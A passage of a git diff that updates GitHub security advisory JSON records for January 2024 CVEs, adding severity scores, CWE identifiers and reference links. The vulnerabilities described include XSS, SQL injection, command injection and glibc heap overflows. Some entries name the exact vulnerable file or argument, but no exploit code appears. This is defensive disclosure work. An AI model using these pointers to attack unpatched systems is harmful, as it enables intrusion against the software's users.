-1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mvvq-wfcg-vq6m", - "modified": "2024-01-23T15:30:58Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T15:30:58Z", "aliases": [ "CVE-2024-0751" ], "details": "A malicious devtools extension could have been used to escalate privileges. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -26,6 +29,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html" + }, { "type": "WEB", "url": "https://www.mozilla.org/security/advisories/mfsa2024-01/" @@ -41,9 +48,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-269" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T14:15:38Z" diff --git a/advisories/unreviewed/2024/01/GHSA-mw6w-j49q-q324/GHSA-mw6w-j49q-q324.json b/advisories/unreviewed/2024/01/GHSA-mw6w-j49q-q324/GHSA-mw6w-j49q-q324.json index ea75c42f6936c..7f8d0ae1aaec6 100644 --- a/advisories/unreviewed/2024/01/GHSA-mw6w-j49q-q324/GHSA-mw6w-j49q-q324.json +++ b/advisories/unreviewed/2024/01/GHSA-mw6w-j49q-q324/GHSA-mw6w-j49q-q324.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mw6w-j49q-q324", - "modified": "2024-01-25T21:32:15Z", + "modified": "2024-01-29T18:31:48Z", "published": "2024-01-25T21:32:15Z", "aliases": [ "CVE-2023-52046" ], "details": "Cross Site Scripting vulnerability (XSS) in webmin v.2.105 and earlier allows a remote attacker to execute arbitrary code via a crafted payload to the \"Execute cron job as\" tab Input field.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-mx75-33vj-x5pm/GHSA-mx75-33vj-x5pm.json b/advisories/unreviewed/2024/01/GHSA-mx75-33vj-x5pm/GHSA-mx75-33vj-x5pm.json new file mode 100644 index 0000000000000..a8be4120b28ee --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-mx75-33vj-x5pm/GHSA-mx75-33vj-x5pm.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mx75-33vj-x5pm", + "modified": "2024-01-29T09:30:24Z", + "published": "2024-01-29T09:30:24Z", + "aliases": [ + "CVE-2023-45932" + ], + "details": "Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45932" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T09:15:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-mxgp-w5v3-c946/GHSA-mxgp-w5v3-c946.json b/advisories/unreviewed/2024/01/GHSA-mxgp-w5v3-c946/GHSA-mxgp-w5v3-c946.json new file mode 100644 index 0000000000000..65790348232f5 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-mxgp-w5v3-c946/GHSA-mxgp-w5v3-c946.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mxgp-w5v3-c946", + "modified": "2024-01-31T18:31:27Z", + "published": "2024-01-31T18:31:27Z", + "aliases": [ + "CVE-2024-22292" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Delower WP To Do allows Stored XSS.This issue affects WP To Do: from n/a through 1.2.8.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22292" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/wp-todo/wordpress-wp-to-do-plugin-1-2-8-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T18:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-mxjq-xrv7-m36q/GHSA-mxjq-xrv7-m36q.json b/advisories/unreviewed/2024/01/GHSA-mxjq-xrv7-m36q/GHSA-mxjq-xrv7-m36q.json index d4b13059a7df6..e8e2db9dca2db 100644 --- a/advisories/unreviewed/2024/01/GHSA-mxjq-xrv7-m36q/GHSA-mxjq-xrv7-m36q.json +++ b/advisories/unreviewed/2024/01/GHSA-mxjq-xrv7-m36q/GHSA-mxjq-xrv7-m36q.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mxjq-xrv7-m36q", - "modified": "2024-01-23T21:30:21Z", + "modified": "2024-01-29T18:31:48Z", "published": "2024-01-23T21:30:21Z", "aliases": [ "CVE-2023-52327" ], "details": "Certain dashboard widgets on Trend Micro Apex Central (on-premise) are vulnerable to cross-site scripting (XSS) attacks that may allow an attacker to achieve remote code execution on affected servers.\n\nPlease note this vulnerability is similar, but not identical to CVE-2023-52328.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-p52c-9f7h-pxpj/GHSA-p52c-9f7h-pxpj.json b/advisories/unreviewed/2024/01/GHSA-p52c-9f7h-pxpj/GHSA-p52c-9f7h-pxpj.json index 7c459be0820e5..5fe407a32cb05 100644 --- a/advisories/unreviewed/2024/01/GHSA-p52c-9f7h-pxpj/GHSA-p52c-9f7h-pxpj.json +++ b/advisories/unreviewed/2024/01/GHSA-p52c-9f7h-pxpj/GHSA-p52c-9f7h-pxpj.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-p52c-9f7h-pxpj", - "modified": "2024-01-22T21:31:07Z", + "modified": "2024-01-30T15:30:21Z", "published": "2024-01-22T21:31:07Z", "aliases": [ "CVE-2024-0606" ], "details": "An attacker could execute unauthorized script on a legitimate site through UXSS using window.open() by opening a javascript URI leading to unauthorized actions within the user's loaded webpage. This vulnerability affects Focus for iOS < 122.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-22T19:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-p52v-f53f-hrr6/GHSA-p52v-f53f-hrr6.json b/advisories/unreviewed/2024/01/GHSA-p52v-f53f-hrr6/GHSA-p52v-f53f-hrr6.json index db72150d24134..0b796c7c4f1cd 100644 --- a/advisories/unreviewed/2024/01/GHSA-p52v-f53f-hrr6/GHSA-p52v-f53f-hrr6.json +++ b/advisories/unreviewed/2024/01/GHSA-p52v-f53f-hrr6/GHSA-p52v-f53f-hrr6.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-p52v-f53f-hrr6", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-29T18:31:47Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-38627" ], "details": "A post-authenticated server-side request forgery (SSRF) vulnerability in Trend Micro Apex Central 2019 (lower than build 6481) could allow an attacker to interact with internal or local services directly.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThis is a similar, but not identical vulnerability as CVE-2023-38626.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-918" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-p5q6-j3pf-jwc7/GHSA-p5q6-j3pf-jwc7.json b/advisories/unreviewed/2024/01/GHSA-p5q6-j3pf-jwc7/GHSA-p5q6-j3pf-jwc7.json index 9998043a56a51..e6a384fb635ad 100644 --- a/advisories/unreviewed/2024/01/GHSA-p5q6-j3pf-jwc7/GHSA-p5q6-j3pf-jwc7.json +++ b/advisories/unreviewed/2024/01/GHSA-p5q6-j3pf-jwc7/GHSA-p5q6-j3pf-jwc7.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-p5q6-j3pf-jwc7", - "modified": "2024-01-28T03:30:35Z", + "modified": "2024-02-01T21:30:30Z", "published": "2024-01-28T03:30:35Z", "aliases": [ "CVE-2024-23742" ], "details": "An issue in Loom on macOS version 0.196.1 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-28T03:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-p5vr-h433-qhqr/GHSA-p5vr-h433-qhqr.json b/advisories/unreviewed/2024/01/GHSA-p5vr-h433-qhqr/GHSA-p5vr-h433-qhqr.json new file mode 100644 index 0000000000000..dea3d74acedce --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-p5vr-h433-qhqr/GHSA-p5vr-h433-qhqr.json @@ -0,0 +1,66 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p5vr-h433-qhqr", + "modified": "2024-01-31T15:30:20Z", + "published": "2024-01-31T15:30:20Z", + "aliases": [ + "CVE-2023-6779" + ], + "details": "An off-by-one heap-based buffer overflow was found in the __vsyslog_internal function of the glibc library. This function is called by the syslog and vsyslog functions. This issue occurs when these functions are called with a message bigger than INT_MAX bytes, leading to an incorrect calculation of the buffer size to store the message, resulting in an application crash. This issue affects glibc 2.37 and newer.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6779" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-6779" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254395" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D2FIH77VHY3KCRROCXOT6L27WMZXSJ2G/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MWQ6BZJ6CV5UAW4VZSKJ6TO4KIW2KWAQ/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-01" + }, + { + "type": "WEB", + "url": "https://www.openwall.com/lists/oss-security/2024/01/30/6" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176932/glibc-syslog-Heap-Based-Buffer-Overflow.html" + }, + { + "type": "WEB", + "url": "http://seclists.org/fulldisclosure/2024/Feb/3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T14:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-p626-3xpc-x4f6/GHSA-p626-3xpc-x4f6.json b/advisories/unreviewed/2024/01/GHSA-p626-3xpc-x4f6/GHSA-p626-3xpc-x4f6.json index 34e17028fd60e..0d6d5305f451f 100644 --- a/advisories/unreviewed/2024/01/GHSA-p626-3xpc-x4f6/GHSA-p626-3xpc-x4f6.json +++ b/advisories/unreviewed/2024/01/GHSA-p626-3xpc-x4f6/GHSA-p626-3xpc-x4f6.json @@ -40,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-276" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-p687-9x5q-6prq/GHSA-p687-9x5q-6prq.json b/advisories/unreviewed/2024/01/GHSA-p687-9x5q-6prq/GHSA-p687-9x5q-6prq.json new file mode 100644 index 0000000000000..23b3da393ce5d --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-p687-9x5q-6prq/GHSA-p687-9x5q-6prq.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p687-9x5q-6prq", + "modified": "2024-02-06T21:30:24Z", + "published": "2024-01-30T03:30:30Z", + "aliases": [ + "CVE-2024-21840" + ], + "details": "Incorrect Default Permissions vulnerability in Hitachi Storage Plug-in for VMware vCenter allows local users to read and write specific files.\n\nThis issue affects Hitachi Storage Plug-in for VMware vCenter: from 04.0.0 through 04.9.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21840" + }, + { + "type": "WEB", + "url": "https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2024-108/index.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-276" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T03:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-p6rw-gvvh-q8v4/GHSA-p6rw-gvvh-q8v4.json b/advisories/unreviewed/2024/01/GHSA-p6rw-gvvh-q8v4/GHSA-p6rw-gvvh-q8v4.json new file mode 100644 index 0000000000000..ed2a54130bead --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-p6rw-gvvh-q8v4/GHSA-p6rw-gvvh-q8v4.json @@ -0,0 +1,75 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p6rw-gvvh-q8v4", + "modified": "2024-01-31T15:30:20Z", + "published": "2024-01-31T15:30:20Z", + "aliases": [ + "CVE-2023-6246" + ], + "details": "A heap-based buffer overflow was found in the __vsyslog_internal function of the glibc library. This function is called by the syslog and vsyslog functions. This issue occurs when the openlog function was not called, or called with the ident argument set to NULL, and the program name (the basename of argv[0]) is bigger than 1024 bytes, resulting in an application crash or local privilege escalation. This issue affects glibc 2.36 and newer.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6246" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-6246" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2249053" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D2FIH77VHY3KCRROCXOT6L27WMZXSJ2G/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MWQ6BZJ6CV5UAW4VZSKJ6TO4KIW2KWAQ/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-01" + }, + { + "type": "WEB", + "url": "https://www.openwall.com/lists/oss-security/2024/01/30/6" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176931/glibc-qsort-Out-Of-Bounds-Read-Write.html" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176932/glibc-syslog-Heap-Based-Buffer-Overflow.html" + }, + { + "type": "WEB", + "url": "http://seclists.org/fulldisclosure/2024/Feb/3" + }, + { + "type": "WEB", + "url": "http://seclists.org/fulldisclosure/2024/Feb/5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122", + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T14:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-p774-6cp5-x7cj/GHSA-p774-6cp5-x7cj.json b/advisories/unreviewed/2024/01/GHSA-p774-6cp5-x7cj/GHSA-p774-6cp5-x7cj.json new file mode 100644 index 0000000000000..dad7e866cb922 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-p774-6cp5-x7cj/GHSA-p774-6cp5-x7cj.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p774-6cp5-x7cj", + "modified": "2024-01-31T21:31:03Z", + "published": "2024-01-31T21:31:03Z", + "aliases": [ + "CVE-2023-28807" + ], + "details": "In Zscaler Internet Access (ZIA) a mismatch between Connect Host and Client Hello's Server Name Indication (SNI) enables attackers to evade network security controls by hiding their communications within legitimate traffic.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28807" + }, + { + "type": "WEB", + "url": "https://help.zscaler.com/zia/configuring-advanced-settings#dns-optimization" + }, + { + "type": "WEB", + "url": "https://help.zscaler.com/zia/configuring-advanced-settings#domain-fronting" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T20:15:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-p899-8gh2-v29w/GHSA-p899-8gh2-v29w.json b/advisories/unreviewed/2024/01/GHSA-p899-8gh2-v29w/GHSA-p899-8gh2-v29w.json index 2aa90c7f1097e..50a6d95ddd2f3 100644 --- a/advisories/unreviewed/2024/01/GHSA-p899-8gh2-v29w/GHSA-p899-8gh2-v29w.json +++ b/advisories/unreviewed/2024/01/GHSA-p899-8gh2-v29w/GHSA-p899-8gh2-v29w.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-p899-8gh2-v29w", - "modified": "2024-01-27T06:30:23Z", + "modified": "2024-02-01T06:31:04Z", "published": "2024-01-27T06:30:23Z", "aliases": [ "CVE-2023-48201" ], "details": "Cross Site Scripting (XSS) vulnerability in Sunlight CMS v.8.0.1, allows remote authenticated attackers to execute arbitrary code and escalate privileges via a crafted script to the Content text editor component.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-27T06:15:47Z" diff --git a/advisories/unreviewed/2024/01/GHSA-p969-49ff-hx55/GHSA-p969-49ff-hx55.json b/advisories/unreviewed/2024/01/GHSA-p969-49ff-hx55/GHSA-p969-49ff-hx55.json new file mode 100644 index 0000000000000..11379996017bb --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-p969-49ff-hx55/GHSA-p969-49ff-hx55.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p969-49ff-hx55", + "modified": "2024-01-31T21:31:03Z", + "published": "2024-01-31T21:31:03Z", + "aliases": [ + "CVE-2024-1115" + ], + "details": "A vulnerability was found in openBI up to 1.0.8 and classified as critical. This issue affects the function dlfile of the file /application/websocket/controller/Setting.php. The manipulation of the argument phpPath leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252473 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1115" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/81JmiyogcYL7" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252473" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252473" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T20:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-pcgj-qq2c-qx79/GHSA-pcgj-qq2c-qx79.json b/advisories/unreviewed/2024/01/GHSA-pcgj-qq2c-qx79/GHSA-pcgj-qq2c-qx79.json new file mode 100644 index 0000000000000..d23a972739550 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-pcgj-qq2c-qx79/GHSA-pcgj-qq2c-qx79.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pcgj-qq2c-qx79", + "modified": "2024-01-29T18:31:49Z", + "published": "2024-01-29T18:31:49Z", + "aliases": [ + "CVE-2024-1007" + ], + "details": "A vulnerability was found in SourceCodester Employee Management System 1.0. It has been classified as critical. Affected is an unknown function of the file edit_profile.php. The manipulation of the argument txtfullname leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252276.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1007" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252276" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252276" + }, + { + "type": "WEB", + "url": "https://www.youtube.com/watch?v=1yesMwvWcL4" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T16:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-pcjv-393q-rqf2/GHSA-pcjv-393q-rqf2.json b/advisories/unreviewed/2024/01/GHSA-pcjv-393q-rqf2/GHSA-pcjv-393q-rqf2.json index 881782a16ee85..c63ee8c4dc054 100644 --- a/advisories/unreviewed/2024/01/GHSA-pcjv-393q-rqf2/GHSA-pcjv-393q-rqf2.json +++ b/advisories/unreviewed/2024/01/GHSA-pcjv-393q-rqf2/GHSA-pcjv-393q-rqf2.json @@ -25,6 +25,42 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2024:0320" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0557" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0558" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0597" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0607" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0614" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0617" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0621" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0626" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0629" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2023-6816" @@ -45,6 +81,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EJBMCWQ54R6ZL3MYU2D2JBW6JMZL7BQW/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-30" + }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/01/18/1" diff --git a/advisories/unreviewed/2024/01/GHSA-pffw-7p63-vrmg/GHSA-pffw-7p63-vrmg.json b/advisories/unreviewed/2024/01/GHSA-pffw-7p63-vrmg/GHSA-pffw-7p63-vrmg.json new file mode 100644 index 0000000000000..c321202053b96 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-pffw-7p63-vrmg/GHSA-pffw-7p63-vrmg.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pffw-7p63-vrmg", + "modified": "2024-01-30T00:30:29Z", + "published": "2024-01-30T00:30:29Z", + "aliases": [ + "CVE-2024-1022" + ], + "details": "A vulnerability, which was classified as problematic, was found in CodeAstro Simple Student Result Management System 5.6. This affects an unknown part of the file /add_classes.php of the component Add Class Page. The manipulation of the argument Class Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252291.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1022" + }, + { + "type": "WEB", + "url": "https://drive.google.com/file/d/1lPZ1yL9UlU-uB03xz17q4OR9338X_1am/view?usp=sharing" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252291" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252291" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T23:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-pg22-9hrc-63jf/GHSA-pg22-9hrc-63jf.json b/advisories/unreviewed/2024/01/GHSA-pg22-9hrc-63jf/GHSA-pg22-9hrc-63jf.json new file mode 100644 index 0000000000000..c310071460233 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-pg22-9hrc-63jf/GHSA-pg22-9hrc-63jf.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pg22-9hrc-63jf", + "modified": "2024-01-31T15:30:20Z", + "published": "2024-01-31T15:30:20Z", + "aliases": [ + "CVE-2024-22285" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in Elise Bosse Frontpage Manager.This issue affects Frontpage Manager: from n/a through 1.3.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22285" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/frontpage-manager/wordpress-frontpage-manager-plugin-1-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T13:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-pg84-6g27-3r3m/GHSA-pg84-6g27-3r3m.json b/advisories/unreviewed/2024/01/GHSA-pg84-6g27-3r3m/GHSA-pg84-6g27-3r3m.json index 37d3baf46c611..a03d4d0dc0f05 100644 --- a/advisories/unreviewed/2024/01/GHSA-pg84-6g27-3r3m/GHSA-pg84-6g27-3r3m.json +++ b/advisories/unreviewed/2024/01/GHSA-pg84-6g27-3r3m/GHSA-pg84-6g27-3r3m.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20971" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0003/" + }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2024.html" diff --git a/advisories/unreviewed/2024/01/GHSA-pgcw-8wrq-74f3/GHSA-pgcw-8wrq-74f3.json b/advisories/unreviewed/2024/01/GHSA-pgcw-8wrq-74f3/GHSA-pgcw-8wrq-74f3.json index a7bdc031897e8..98a03ad20a09f 100644 --- a/advisories/unreviewed/2024/01/GHSA-pgcw-8wrq-74f3/GHSA-pgcw-8wrq-74f3.json +++ 